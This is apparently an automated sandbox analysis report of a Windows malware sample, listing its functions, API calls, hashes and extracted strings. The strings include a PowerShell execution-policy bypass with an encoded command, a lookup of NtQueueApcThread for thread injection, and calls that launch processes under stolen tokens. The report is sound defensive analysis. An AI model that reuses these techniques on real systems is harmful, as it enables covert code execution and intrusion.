Yara matches

Similarity

API ID: CleanupStartup
String ID:
API String ID: 915672949-0
Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
Instruction ID: e884fee1bb4c98631f262bdf6907ae2d834792547d9a64c214e260f98231aede
Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
Instruction Fuzzy Hash: B2112D70601B42C6FB24AB60F86936432DBEB46344F50043D97194B3ABDF7E85A9CB15

Function 001B96B4 Relevance: 1.6, APIs: 1, Instructions: 149
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 001B977B

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
Instruction ID: efd88f1dba25db5d1f0e43baab4af7ca16a4ccce529ffc94f2ae934aebaebbcd
Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
Instruction Fuzzy Hash: 7E619936219B8486CAA4CB1AE49035AB7A4F7C9B98F544125EFCE83B28DF3DD555CB00

Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885

SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: Sleep$CountCreateThreadTickmalloc
String ID:
API String ID: 345437100-0
Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E

Function 001B9324 Relevance: 1.3, APIs: 1, Instructions: 87
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 001B9471

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction ID: f8e345c21f6f9c9e839c43a71cb4834d3fbaf0f1daad40beabb24e80c0c04f1e
Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction Fuzzy Hash: 12419772628B8487DB64CB1AE48471AB7A1F7C8B94F105225FBDE87B68DB3CD4518F00

Non-executed Functions

Function 00686514 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0068656A
_errno.LIBCMT ref: 00686571
_invalid_parameter_noinfo.LIBCMT ref: 0068657C

Strings

U, xrefs: 00686ADE

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
Instruction ID: ec14a26c44d62a4c083659281745be02a7e1ba2226b7defda2d8e2cb297eb1e3
Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
Instruction Fuzzy Hash: 9902357231468186DB20EF28E4843AEB767F785B48F540216FB8987B58DF3EC956CB11

Function 0067867C Relevance: 46.6, APIs: 22, Strings: 4, Instructions: 1078processCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00678FA0
CreateToolhelp32Snapshot.KERNEL32 ref: 00678FD9
Process32First.KERNEL32 ref: 00678FFB

Strings

%s%d%d, xrefs: 00679046
%s%d%d%s%s%d, xrefs: 006790E0
x86, xrefs: 00678FC7, 006790B0
x64, xrefs: 00678FB2, 00678FC0

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
API String ID: 718051232-1833344708
Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
Instruction ID: 752ecabde62a66407af9c842d5c33e994ba71729f6791cc7c402b3997ffc8998
Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
Instruction Fuzzy Hash: A8726D21B44641C6DB68DB2698583B913D3B789BC0FA4C126DE0F87B59EE39CD87CB41

Function 00682F9C Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682FFD

Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672

_errno.LIBCMT ref: 00683002

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

_fileno.LIBCMT ref: 0068302F

Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68

write_multi_char.LIBCMT ref: 0068366B
write_string.LIBCMT ref: 00683688
write_multi_char.LIBCMT ref: 006836A5
write_string.LIBCMT ref: 00683704
write_string.LIBCMT ref: 0068373B
write_multi_char.LIBCMT ref: 0068375D
free.LIBCMT ref: 00683771
_isleadbyte_l.LIBCMT ref: 00683842
write_char.LIBCMT ref: 00683858
write_char.LIBCMT ref: 00683879
_errno.LIBCMT ref: 0068397C
_invalid_parameter_noinfo.LIBCMT ref: 00683987

Strings

, xrefs: 0068363F
@, xrefs: 0068301B

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3318157856-1077428164
Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
Instruction ID: 553c916e11350bd172c27715927b5fa2c9722ca7020bfaf0cce802a564827fec
Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
Instruction Fuzzy Hash: D34244B26086A486EB25EF19D5543BE6BB3F741F90F140305DE4A17B98EB79CB41CB01

Function 00682528 Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682589

Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672

_errno.LIBCMT ref: 0068258E

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

_fileno.LIBCMT ref: 006825BB

Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68

write_multi_char.LIBCMT ref: 00682BEB
write_string.LIBCMT ref: 00682C08
write_multi_char.LIBCMT ref: 00682C25
write_string.LIBCMT ref: 00682C84
write_string.LIBCMT ref: 00682CBB
write_multi_char.LIBCMT ref: 00682CDD
free.LIBCMT ref: 00682CF1
_isleadbyte_l.LIBCMT ref: 00682DC2
write_char.LIBCMT ref: 00682DD8
write_char.LIBCMT ref: 00682DF9
_errno.LIBCMT ref: 00682EF3
_invalid_parameter_noinfo.LIBCMT ref: 00682EFE

Strings

, xrefs: 00682BBF

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3318157856-3916222277
Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
Instruction ID: 2896283ac4f2a1ac83dbb9fac2a01ee60df2fa2cca1931e9dd44a3f7c29ad242
Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
Instruction Fuzzy Hash: 3D32547220868686EF29EF15D5643BE6FB3FB45B94F241305DE4A17B68DB78C841CB40

Function 001C239C Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 694COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C23FD

Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72

_errno.LIBCMT ref: 001C2402

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

_fileno.LIBCMT ref: 001C242F

Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68

write_multi_char.LIBCMT ref: 001C2A6B
write_string.LIBCMT ref: 001C2A88
write_multi_char.LIBCMT ref: 001C2AA5
write_string.LIBCMT ref: 001C2B04
write_string.LIBCMT ref: 001C2B3B
write_multi_char.LIBCMT ref: 001C2B5D
free.LIBCMT ref: 001C2B71
_isleadbyte_l.LIBCMT ref: 001C2C42
write_char.LIBCMT ref: 001C2C58
write_char.LIBCMT ref: 001C2C79
_errno.LIBCMT ref: 001C2D7C
_invalid_parameter_noinfo.LIBCMT ref: 001C2D87

Strings

, xrefs: 001C2A3F
@, xrefs: 001C241B

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3318157856-1077428164
Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
Instruction ID: 894fc212aefd36256bb4a76e233e0adf7cc69257a1cca1681f47039ea8f6e663
Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
Instruction Fuzzy Hash: E8421032608B9487EB29CF59D544FBE7BB0B775B84F24100EDE4A47AA8DB78C840CB01

Function 001C1928 Relevance: 28.6, APIs: 14, Strings: 2, Instructions: 645COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C1989

Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72

_errno.LIBCMT ref: 001C198E

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

_fileno.LIBCMT ref: 001C19BB

Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68

write_multi_char.LIBCMT ref: 001C1FEB
write_string.LIBCMT ref: 001C2008
_errno.LIBCMT ref: 001C22F3
_invalid_parameter_noinfo.LIBCMT ref: 001C22FE

Strings

0, xrefs: 001C1D28
-, xrefs: 001C1F9C

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
String ID: -$0
API String ID: 3246410048-417717675
Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
Instruction ID: a41121ecebb48c11a1d8c2787aaf8ced3d8e74097b573b9f87d3053120b2844f
Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
Instruction Fuzzy Hash: 8D3225726486D496EB29CB55D544FBE7BB0F776784F28100EEF4A47AA9DB38C840CB00

Function 001C5914 Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 460COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 001C596A
_errno.LIBCMT ref: 001C5971
_invalid_parameter_noinfo.LIBCMT ref: 001C597C

Strings

U, xrefs: 001C5EDE

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
Instruction ID: 22f53ffff2642abfb00545f65aa01530eb72d904a6e8a21be2e57ddf3167229a
Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
Instruction Fuzzy Hash: F7022533214B8186DB208F28E484BAEB776F7A5798F54011EEB8943B54DF3DE985CB10

Function 00677B38 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 00677D66
_snprintf.LIBCMT ref: 00677D83
_snprintf.LIBCMT ref: 00677CA5

Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E

_snprintf.LIBCMT ref: 00677FD8
_snprintf.LIBCMT ref: 00678334

Strings

%s%s, xrefs: 00677FC7, 00677FF1, 00678195, 00678326
?%s, xrefs: 00678257
%s&%s, xrefs: 0067826A
%s%s: %s, xrefs: 00677C94
%s%s, xrefs: 006780D7
?%s=%s, xrefs: 00677D5A
%s&%s=%s, xrefs: 00677D77

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
API String ID: 3442832105-1222817042
Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
Instruction ID: f165d54bb1ff977ae2693509bbd572190c045ac707b9e2ef795a30137aa3c4d4
Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
Instruction Fuzzy Hash: B032E962614E8592EB258F2DE0452E9B3B1FF98799F049101EF8D17B21EF38D6A7C344

Function 00671C30 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00671C63

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057

Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F

GetCurrentDirectoryA.KERNEL32 ref: 00671CDB
FindFirstFileA.KERNEL32 ref: 00671D14
GetLastError.KERNEL32 ref: 00671D23
free.LIBCMT ref: 00671D5E
free.LIBCMT ref: 00671D6B

Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C

FileTimeToSystemTime.KERNEL32 ref: 00671D78
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00671D89
FindNextFileA.KERNEL32 ref: 00671E46
FindClose.KERNEL32 ref: 00671E57

Strings

D0%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 00671DCB
F%I64d%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 00671E29
.\*, xrefs: 00671CBF
%s, xrefs: 00671CF9

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
API String ID: 723279517-1754256099
Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
Instruction ID: fb2f42af140046c5152ca76007fff4314e7617e9a63a981f5e9d9da63bfdfffd
Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
Instruction Fuzzy Hash: D051CF7270875196DB50DF66E8507AEA3A2F385B84F40402AEE4E47B58EF7CC60ACB40

Function 001B6F38 Relevance: 18.5, APIs: 10, Strings: 2, Instructions: 545COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 001B7166
_snprintf.LIBCMT ref: 001B7183
_snprintf.LIBCMT ref: 001B70A5

Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E

_snprintf.LIBCMT ref: 001B73D8
_snprintf.LIBCMT ref: 001B7734

Strings

nop -exec bypass -EncodedCommand "%s", xrefs: 001B74D7
not create token: %d, xrefs: 001B7657

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
API String ID: 3442832105-3652497171
Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
Instruction ID: 2f9b2cb9d9b2c9bc8f052c9aa5cc4283acf63cc8586ad332c123fcfba5c15db3
Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
Instruction Fuzzy Hash: 5732FC62618EC492EB259F2DE0413E9B3B0FFA8799F445501DF8917B65EF38D2A6C340

Function 00670F34 Relevance: 18.2, APIs: 12, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32 ref: 00670F8F
GetLastError.KERNEL32 ref: 00670F9D
GetLastError.KERNEL32 ref: 00670FC1

Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9

CreateProcessA.KERNEL32 ref: 00671013
GetLastError.KERNEL32 ref: 0067101D
GetCurrentDirectoryW.KERNEL32 ref: 00671374
GetCurrentDirectoryW.KERNEL32 ref: 00671388
CreateProcessWithTokenW.ADVAPI32 ref: 006713D1

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
String ID:
API String ID: 3044875250-0
Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
Instruction ID: ddd496feb17ee8c2b893683ede9fb43acc4ce5d056f1b139581cf5cf7671d55c
Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
Instruction Fuzzy Hash: EA619B72214B40D6EB20DF25E89435E73A6F749B94F10812AEA4E87B18DF7DC8A5CB50

Function 00679220 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0067924F

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

_snprintf.LIBCMT ref: 00679267

Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E

FindFirstFileA.KERNEL32 ref: 00679272
free.LIBCMT ref: 0067927E

Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C

malloc.LIBCMT ref: 006792CE
_snprintf.LIBCMT ref: 006792E6
free.LIBCMT ref: 0067930E
FindNextFileA.KERNEL32 ref: 00679327
FindClose.KERNEL32 ref: 00679338

Strings

%s\*, xrefs: 00679254

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
String ID: %s\*
API String ID: 2620626937-766152087
Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
Instruction ID: b9f7dc96f4b337169066c32773aa2e023003f420f908839e69a4b092d4227770
Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
Instruction Fuzzy Hash: 5831D5113046C255DA15AB636C207B97BA7B74AFE0F88C125DEED0BB96CE39C563C314

Function 00401A70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00401A84
RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
RtlVirtualUnwind.KERNEL32 ref: 00401ADD
SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
GetCurrentProcess.KERNEL32 ref: 00401B34
TerminateProcess.KERNEL32 ref: 00401B42
abort.MSVCRT ref: 00401B48

Strings

@5E, xrefs: 00401B27

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
String ID: @5E
API String ID: 4278921479-727458683
Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748

Function 00673A64 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113sleepprocesslibraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00673ACE
GetProcAddress.KERNEL32 ref: 00673ADE

Part of subcall function 00673984: malloc.LIBCMT ref: 006739C2
Part of subcall function 00673984: free.LIBCMT ref: 00673A45

CreateToolhelp32Snapshot.KERNEL32 ref: 00673B10
Thread32Next.KERNEL32 ref: 00673B7A
Sleep.KERNEL32 ref: 00673B90

Strings

NtQueueApcThread, xrefs: 00673AD4
ntdll, xrefs: 00673A99

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
String ID: NtQueueApcThread$ntdll
API String ID: 1427994231-1374908105
Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
Instruction ID: 173fb5629102f313e9d9874a9f15bb623e96bfa68c595a2679f6e732873ab5c7
Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
Instruction Fuzzy Hash: 1A418B32701B519AEB20CB62E8407ED73B6FB58B88F54812ADE4D97B18EF39C645C744

Function 00676A78 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00676AB0
htons.WS2_32 ref: 00676AD0
ioctlsocket.WS2_32 ref: 00676AEC
closesocket.WS2_32 ref: 00676AFA
bind.WS2_32 ref: 00676B0D
listen.WS2_32 ref: 00676B1D

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

